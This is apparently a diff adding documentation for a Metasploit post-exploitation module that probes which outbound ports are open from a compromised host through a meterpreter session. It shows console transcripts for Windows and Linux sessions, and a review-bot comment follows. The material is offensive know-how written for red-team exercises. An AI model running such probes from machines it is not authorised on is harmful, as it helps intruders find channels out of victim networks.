| 1 | +This is a Meterpreter post exploitation module that will generate TCP and UDP packets on a range of ports and send them to a provided IP address. The primary purpose of this is for 'egress busting' and provides a rapid method of generating legitimate TCP or UDP traffic on each port. This is useful for red-teaming type exercises in which you have meterpreter running on a host but wish to determine additional ports over which egress traffic is permitted. |
| 2 | + |
| 3 | +It can generate the packets in two different ways; it can call the Windows sockets API (using railgun for Windows clients) or it can create the packets using Rex. |
| 4 | + |
| 5 | +NATIVE mode uses Rex sockets to generate traffic. |
| 6 | +WINAPI mode uses Winsock APIs to generate traffic. |
| 7 | + |
| 8 | +As it currently stands, the user will need to set up a listener/tcpdump/wireshark to determine the ports that are open. My [egresscheck-framework](https://github.com/stufus/egresscheck-framework ) code can help with that, but any listener would be fine. |
| 9 | + |
| 10 | +# Example - Windows Meterpreter |
| 11 | + |
| 12 | +Scenario is: |
| 13 | + |
| 14 | +* The victim host is 192.0.2.104 |
| 15 | +* The attacker is 192.0.2.1 |
| 16 | +* The attacker wishes to generate TCP packets to 192.0.2.1 (with meterpreter on 192.0.2.104) on ports 22,23,53,80,88,443 and 445 to see if any of the packets reach 192.0.2.1. Note that the attacker has control of 192.0.2.1. |
| 17 | +* The compromised machine is a Windows 8.1 machine |
| 18 | + |
| 19 | +``` |
| 20 | +msf> sessions -l |
| 21 | +
|
| 22 | +Active sessions |
| 23 | +=============== |
| 24 | +
|
| 25 | + Id Type Information Connection |
| 26 | + -- ---- ----------- ---------- |
| 27 | + 2 meterpreter x86/win32 TESTER\Stuart @ TESTER 192.0.2.1:9877 -> 192.0.2.104:43595 (192.0.2.104) |
| 28 | +
|
| 29 | +msf> set METHOD NATIVE |
| 30 | +METHOD => NATIVE |
| 31 | +msf> set PORTS 22,23,53,80,88,443,445 |
| 32 | +PORTS => 22,23,53,80,88,443,445 |
| 33 | +msf> set PROTOCOL TCP |
| 34 | +PROTOCOL => TCP |
| 35 | +msf> set SESSION 2 |
| 36 | +SESSION => 2 |
| 37 | +msf> set TARGET 192.0.2.1 |
| 38 | +TARGET => 192.0.2.1 |
| 39 | +msf> set THREADS 3 |
| 40 | +THREADS => 3 |
| 41 | +msf> show options |
| 42 | +
|
| 43 | +Module options (post/multi/manage/multiport_egress_traffic): |
| 44 | +
|
| 45 | + Name Current Setting Required Description |
| 46 | + ---- --------------- -------- ----------- |
| 47 | + METHOD NATIVE yes The mechanism by which the packets are generated. Can be NATIVE or WINAPI (Windows only). (Accepted: NATIVE, WINAPI) |
| 48 | + PORTS 22,23,53,80,88,443,445 yes Ports to test. |
| 49 | + PROTOCOL TCP yes Protocol to use. (Accepted: TCP, UDP) |
| 50 | + SESSION 2 yes The session to run this module on. |
| 51 | + TARGET 192.0.2.1 yes Destination IP address. |
| 52 | + THREADS 3 yes Number of simultaneous threads/connections to try. |
| 53 | +
|
| 54 | +msf> run |
| 55 | +[*] Generating TCP traffic to 192.0.2.1... |
| 56 | +[*] TCP traffic generation to 192.0.2.1 completed. |
| 57 | +[*] Post module execution completed |
| 58 | +msf> set VERBOSE TRUE |
| 59 | +VERBOSE => TRUE |
| 60 | +msf> run |
| 61 | +[*] Number of threads: 3. |
| 62 | +[*] Generating TCP traffic to 192.0.2.1... |
| 63 | +[*] [1:NATIVE] Connecting to 192.0.2.1 port TCP/23 |
| 64 | +[*] [2:NATIVE] Connecting to 192.0.2.1 port TCP/53 |
| 65 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/22 |
| 66 | +[*] [2:NATIVE] Error connecting to 192.0.2.1 TCP/53 |
| 67 | +[*] [1:NATIVE] Error connecting to 192.0.2.1 TCP/23 |
| 68 | +[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/22 |
| 69 | +[*] [1:NATIVE] Connecting to 192.0.2.1 port TCP/88 |
| 70 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/80 |
| 71 | +[*] [2:NATIVE] Connecting to 192.0.2.1 port TCP/443 |
| 72 | +[*] [1:NATIVE] Error connecting to 192.0.2.1 TCP/88 |
| 73 | +[*] [2:NATIVE] Error connecting to 192.0.2.1 TCP/443 |
| 74 | +[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/80 |
| 75 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/445 |
| 76 | +[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/445 |
| 77 | +[*] TCP traffic generation to 192.0.2.1 completed. |
| 78 | +[*] Post module execution completed |
| 79 | +``` |
| 80 | + |
| 81 | +Here is an example with the METHOD parameter set to WINAPI: |
| 82 | + |
| 83 | +``` |
| 84 | +msf> set METHOD WINAPI |
| 85 | +METHOD => WINAPI |
| 86 | +msf> run |
| 87 | +
|
| 88 | +[*] Number of threads: 3. |
| 89 | +[*] Generating TCP traffic to 192.0.2.1... |
| 90 | +[*] [2:WINAPI] Set up socket for 192.0.2.1 port TCP/53 (Handle: 14908) |
| 91 | +[*] [1:WINAPI] Set up socket for 192.0.2.1 port TCP/23 (Handle: 14856) |
| 92 | +[*] [2:WINAPI] Connecting to 192.0.2.1:TCP/53 |
| 93 | +[*] [1:WINAPI] Connecting to 192.0.2.1:TCP/23 |
| 94 | +[*] [0:WINAPI] Set up socket for 192.0.2.1 port TCP/22 (Handle: 14300) |
| 95 | +[*] [0:WINAPI] Connecting to 192.0.2.1:TCP/22 |
| 96 | +[*] [2:WINAPI] There was an error sending a connect packet for TCP socket (port 53) Error: 10061 |
| 97 | +[*] [0:WINAPI] There was an error sending a connect packet for TCP socket (port 22) Error: 10061 |
| 98 | +[*] [1:WINAPI] There was an error sending a connect packet for TCP socket (port 23) Error: 10061 |
| 99 | +[*] [1:WINAPI] Set up socket for 192.0.2.1 port TCP/88 (Handle: 13868) |
| 100 | +[*] [0:WINAPI] Set up socket for 192.0.2.1 port TCP/80 (Handle: 14300) |
| 101 | +[*] [1:WINAPI] Connecting to 192.0.2.1:TCP/88 |
| 102 | +[*] [2:WINAPI] Set up socket for 192.0.2.1 port TCP/443 (Handle: 14908) |
| 103 | +[*] [0:WINAPI] Connecting to 192.0.2.1:TCP/80 |
| 104 | +[*] [2:WINAPI] Connecting to 192.0.2.1:TCP/443 |
| 105 | +[*] [1:WINAPI] There was an error sending a connect packet for TCP socket (port 88) Error: 10061 |
| 106 | +[*] [2:WINAPI] There was an error sending a connect packet for TCP socket (port 443) Error: 10061 |
| 107 | +[*] [0:WINAPI] There was an error sending a connect packet for TCP socket (port 80) Error: 10061 |
| 108 | +[*] [0:WINAPI] Set up socket for 192.0.2.1 port TCP/445 (Handle: 13868) |
| 109 | +[*] [0:WINAPI] Connecting to 192.0.2.1:TCP/445 |
| 110 | +[*] [0:WINAPI] There was an error sending a connect packet for TCP socket (port 445) Error: 10061 |
| 111 | +[*] TCP traffic generation to 192.0.2.1 completed. |
| 112 | +[*] Post module execution completed |
| 113 | +``` |
| 114 | + |
| 115 | +UDP also works correctly: |
| 116 | + |
| 117 | +``` |
| 118 | +msf> set PROTOCOL UDP |
| 119 | +PROTOCOL => UDP |
| 120 | +msf> set METHOD NATIVE |
| 121 | +METHOD => NATIVE |
| 122 | +msf> show options |
| 123 | +
|
| 124 | +Module options (post/multi/manage/multiport_egress_traffic): |
| 125 | +
|
| 126 | + Name Current Setting Required Description |
| 127 | + ---- --------------- -------- ----------- |
| 128 | + METHOD NATIVE yes The mechanism by which the packets are generated. Can be NATIVE or WINAPI (Windows only). (Accepted: NATIVE, WINAPI) |
| 129 | + PORTS 22,23,53,80,88,443,445 yes Ports to test. |
| 130 | + PROTOCOL UDP yes Protocol to use. (Accepted: TCP, UDP) |
| 131 | + SESSION 2 yes The session to run this module on. |
| 132 | + TARGET 192.0.2.1 yes Destination IP address. |
| 133 | + THREADS 3 yes Number of simultaneous threads/connections to try. |
| 134 | +
|
| 135 | +msf> run |
| 136 | +
|
| 137 | +[*] Number of threads: 3. |
| 138 | +[*] Generating UDP traffic to 192.0.2.1... |
| 139 | +[*] [1:NATIVE] Connecting to 192.0.2.1 port UDP/23 |
| 140 | +[*] [2:NATIVE] Connecting to 192.0.2.1 port UDP/53 |
| 141 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/22 |
| 142 | +[*] [2:NATIVE] Connecting to 192.0.2.1 port UDP/443 |
| 143 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/80 |
| 144 | +[*] [1:NATIVE] Connecting to 192.0.2.1 port UDP/88 |
| 145 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/445 |
| 146 | +[*] UDP traffic generation to 192.0.2.1 completed. |
| 147 | +[*] Post module execution completed |
| 148 | +``` |
| 149 | + |
| 150 | +Note that the errors showing in verbose mode are normal; this is because there is nothing actually listening on any of those ports, meaning that the calls will fail. |
| 151 | + |
| 152 | +Running tcpdump on 192.0.2.1 showed all the connection attempts as normal. |
| 153 | + |
| 154 | +# Example - Linux Meterpreter |
| 155 | + |
| 156 | +Scenario is: |
| 157 | + |
| 158 | +* The victim host is 192.0.2.103 |
| 159 | +* The attacker is 192.0.2.1 |
| 160 | +* The attacker wishes to generate TCP packets to 192.0.2.1 (with linux meterpreter on 192.0.2.103) on ports 22,23,53,80,88,443 and 445 to see if any of the packets reach 192.0.2.1. Note that the attacker has control of 192.0.2.1. |
| 161 | +* The compromised machine is a Linux machine (running Kali) |
| 162 | + |
| 163 | +``` |
| 164 | +msf> sessions -l |
| 165 | +
|
| 166 | +Active sessions |
| 167 | +=============== |
| 168 | +
|
| 169 | + Id Type Information Connection |
| 170 | + -- ---- ----------- ---------- |
| 171 | + 4 meterpreter x86/linux uid=1000, gid=1001, euid=1000, egid=1001, suid=1000, sgid=1001 @ kali 192.0.2.1:4322 -> 192.0.2.103:37489 (192.0.2.103) |
| 172 | +
|
| 173 | +msf> run |
| 174 | +[*] Number of threads: 3. |
| 175 | +[*] Generating TCP traffic to 192.0.2.1... |
| 176 | +[*] [1:NATIVE] Connecting to 192.0.2.1 port TCP/23 |
| 177 | +[*] [2:NATIVE] Connecting to 192.0.2.1 port TCP/53 |
| 178 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/22 |
| 179 | +[*] [1:NATIVE] Error connecting to 192.0.2.1 TCP/23 |
| 180 | +[*] [1:NATIVE] Connecting to 192.0.2.1 port TCP/88 |
| 181 | +[*] [2:NATIVE] Error connecting to 192.0.2.1 TCP/53 |
| 182 | +[*] [2:NATIVE] Connecting to 192.0.2.1 port TCP/443 |
| 183 | +[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/22 |
| 184 | +[*] [1:NATIVE] Error connecting to 192.0.2.1 TCP/88 |
| 185 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/80 |
| 186 | +[*] [2:NATIVE] Error connecting to 192.0.2.1 TCP/443 |
| 187 | +[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/80 |
| 188 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/445 |
| 189 | +[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/445 |
| 190 | +[*] TCP traffic generation to 192.0.2.1 completed. |
| 191 | +[*] Post module execution completed |
| 192 | +msf> set PROTOCOL UDP |
| 193 | +PROTOCOL => UDP |
| 194 | +msf> run |
| 195 | +[*] Number of threads: 3. |
| 196 | +[*] Generating UDP traffic to 192.0.2.1... |
| 197 | +[*] [1:NATIVE] Connecting to 192.0.2.1 port UDP/23 |
| 198 | +[*] [2:NATIVE] Connecting to 192.0.2.1 port UDP/53 |
| 199 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/22 |
| 200 | +[*] [2:NATIVE] Connecting to 192.0.2.1 port UDP/443 |
| 201 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/80 |
| 202 | +[*] [1:NATIVE] Connecting to 192.0.2.1 port UDP/88 |
| 203 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/445 |
| 204 | +[*] UDP traffic generation to 192.0.2.1 completed. |
| 205 | +[*] Post module execution completed |
| 206 | +msf> show options |
| 207 | +
|
| 208 | +Module options (post/multi/manage/multiport_egress_traffic): |
| 209 | +
|
| 210 | + Name Current Setting Required Description |
| 211 | + ---- --------------- -------- ----------- |
| 212 | + METHOD NATIVE yes The mechanism by which the packets are generated. Can be NATIVE or WINAPI (Windows only). (Accepted: NATIVE, WINAPI) |
| 213 | + PORTS 22,23,53,80,88,443,445 yes Ports to test. |
| 214 | + PROTOCOL UDP yes Protocol to use. (Accepted: TCP, UDP) |
| 215 | + SESSION 4 yes The session to run this module on. |
| 216 | + TARGET 192.0.2.1 yes Destination IP address. |
| 217 | + THREADS 3 yes Number of simultaneous threads/connections to try. |
| 218 | +
|
| 219 | +msf> |
| 220 | +``` |
| 221 | + |
| 222 | + |
| 223 | + |
| 224 | +# Future Work |
| 225 | + |
| 226 | +This module did not appear to work on python meterpreter. |
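Review bot: the egresscheck-framework link in the "As it currently stands" paragraph has a stray space before the closing parenthesis (`https://github.com/stufus/egresscheck-framework )`), which breaks the markdown link; remove the space. The note that the verbose-mode errors are normal would be more useful if it said what they mean: the WINAPI runs report `Error: 10061`, which is WSAECONNREFUSED, so the SYN reached 192.0.2.1 and an RST came back, and a refused connection is therefore already evidence that the port is open for egress, whereas WSAETIMEDOUT (10060) or an unreachable error points to filtering; the docs could state this instead of telling the reader only to rely on the listener. The same paragraph should also explain why the UDP runs show no errors at all: a datagram send returns without waiting for a reply, so for UDP the tcpdump/listener side is the only place a result can be read. The "Future Work" line about python meterpreter should record the actual failure observed (error text or behaviour) so that someone can pick it up later.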